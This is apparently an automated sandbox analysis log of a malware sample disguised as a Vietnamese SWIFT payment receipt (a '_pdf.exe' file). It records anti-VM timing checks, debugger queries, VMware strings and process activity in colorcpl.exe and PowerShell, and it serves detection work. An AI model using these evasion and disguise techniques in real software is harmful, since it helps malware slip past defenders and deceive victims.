Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 3289904 second address: 328990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 3289B7E second address: 3289B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 11E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 54B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 64B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 65E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 75E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 7AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 8AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 9AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 54B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 65E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 7E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 8E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: D4B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Memory allocated: 9E10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Code function: 4_2_00409AB0 rdtsc

4_2_00409AB0

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7828	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1764	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 7023	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2910	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 889	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 861	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 3257	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 6712	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_6-13775

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 2.2 %

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe TID: 2852	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7056	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5308	Thread sleep count: 7023 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5308	Thread sleep time: -14046000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5308	Thread sleep count: 2910 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5308	Thread sleep time: -5820000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1908	Thread sleep count: 3257 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1908	Thread sleep time: -6514000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1908	Thread sleep count: 6712 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1908	Thread sleep time: -13424000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000000.2173161867.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000006.00000000.2174937509.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000002.3365438539.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2173161867.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000006.00000000.2180275775.000000000C354000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000002.3366414703.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 00000006.00000000.2173161867.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000006.00000000.2180275775.000000000C354000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000006.00000000.2180275775.000000000C354000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@]
Source: explorer.exe, 00000006.00000002.3347634724.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2173161867.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000002.3347634724.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: explorer.exe, 00000006.00000002.3372354136.000000000C377000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000002.3366414703.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 00000006.00000002.3347634724.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000002.3366414703.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000006.00000002.3347634724.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Code function: 4_2_00409AB0 rdtsc

4_2_00409AB0

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Code function: 4_2_0040ACF0 LdrLoadDll,

4_2_0040ACF0

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01210124 mov eax, dword ptr fs:[00000030h]	4_2_01210124
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov eax, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov ecx, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov eax, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov eax, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov ecx, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov eax, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov eax, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov ecx, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov eax, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E10E mov ecx, dword ptr fs:[00000030h]	4_2_0128E10E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128A118 mov ecx, dword ptr fs:[00000030h]	4_2_0128A118
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128A118 mov eax, dword ptr fs:[00000030h]	4_2_0128A118
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128A118 mov eax, dword ptr fs:[00000030h]	4_2_0128A118
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128A118 mov eax, dword ptr fs:[00000030h]	4_2_0128A118
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A0115 mov eax, dword ptr fs:[00000030h]	4_2_012A0115
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6154 mov eax, dword ptr fs:[00000030h]	4_2_011E6154
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6154 mov eax, dword ptr fs:[00000030h]	4_2_011E6154
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DC156 mov eax, dword ptr fs:[00000030h]	4_2_011DC156
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4164 mov eax, dword ptr fs:[00000030h]	4_2_012B4164
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4164 mov eax, dword ptr fs:[00000030h]	4_2_012B4164
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01274144 mov eax, dword ptr fs:[00000030h]	4_2_01274144
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01274144 mov eax, dword ptr fs:[00000030h]	4_2_01274144
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01274144 mov ecx, dword ptr fs:[00000030h]	4_2_01274144
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01274144 mov eax, dword ptr fs:[00000030h]	4_2_01274144
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01274144 mov eax, dword ptr fs:[00000030h]	4_2_01274144
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01278158 mov eax, dword ptr fs:[00000030h]	4_2_01278158
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DA197 mov eax, dword ptr fs:[00000030h]	4_2_011DA197
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DA197 mov eax, dword ptr fs:[00000030h]	4_2_011DA197
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DA197 mov eax, dword ptr fs:[00000030h]	4_2_011DA197
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129C188 mov eax, dword ptr fs:[00000030h]	4_2_0129C188
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129C188 mov eax, dword ptr fs:[00000030h]	4_2_0129C188
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01220185 mov eax, dword ptr fs:[00000030h]	4_2_01220185
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01284180 mov eax, dword ptr fs:[00000030h]	4_2_01284180
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01284180 mov eax, dword ptr fs:[00000030h]	4_2_01284180
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126019F mov eax, dword ptr fs:[00000030h]	4_2_0126019F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126019F mov eax, dword ptr fs:[00000030h]	4_2_0126019F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126019F mov eax, dword ptr fs:[00000030h]	4_2_0126019F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126019F mov eax, dword ptr fs:[00000030h]	4_2_0126019F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B61E5 mov eax, dword ptr fs:[00000030h]	4_2_012B61E5
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012101F8 mov eax, dword ptr fs:[00000030h]	4_2_012101F8
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A61C3 mov eax, dword ptr fs:[00000030h]	4_2_012A61C3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A61C3 mov eax, dword ptr fs:[00000030h]	4_2_012A61C3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0125E1D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0125E1D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E1D0 mov ecx, dword ptr fs:[00000030h]	4_2_0125E1D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0125E1D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0125E1D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FE016 mov eax, dword ptr fs:[00000030h]	4_2_011FE016
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FE016 mov eax, dword ptr fs:[00000030h]	4_2_011FE016
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FE016 mov eax, dword ptr fs:[00000030h]	4_2_011FE016
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FE016 mov eax, dword ptr fs:[00000030h]	4_2_011FE016
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01276030 mov eax, dword ptr fs:[00000030h]	4_2_01276030
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01264000 mov ecx, dword ptr fs:[00000030h]	4_2_01264000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01282000 mov eax, dword ptr fs:[00000030h]	4_2_01282000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01282000 mov eax, dword ptr fs:[00000030h]	4_2_01282000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01282000 mov eax, dword ptr fs:[00000030h]	4_2_01282000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01282000 mov eax, dword ptr fs:[00000030h]	4_2_01282000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01282000 mov eax, dword ptr fs:[00000030h]	4_2_01282000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01282000 mov eax, dword ptr fs:[00000030h]	4_2_01282000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01282000 mov eax, dword ptr fs:[00000030h]	4_2_01282000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01282000 mov eax, dword ptr fs:[00000030h]	4_2_01282000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DA020 mov eax, dword ptr fs:[00000030h]	4_2_011DA020
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DC020 mov eax, dword ptr fs:[00000030h]	4_2_011DC020
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E2050 mov eax, dword ptr fs:[00000030h]	4_2_011E2050
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120C073 mov eax, dword ptr fs:[00000030h]	4_2_0120C073
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01266050 mov eax, dword ptr fs:[00000030h]	4_2_01266050
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012780A8 mov eax, dword ptr fs:[00000030h]	4_2_012780A8
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A60B8 mov eax, dword ptr fs:[00000030h]	4_2_012A60B8
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A60B8 mov ecx, dword ptr fs:[00000030h]	4_2_012A60B8
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E208A mov eax, dword ptr fs:[00000030h]	4_2_011E208A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D80A0 mov eax, dword ptr fs:[00000030h]	4_2_011D80A0
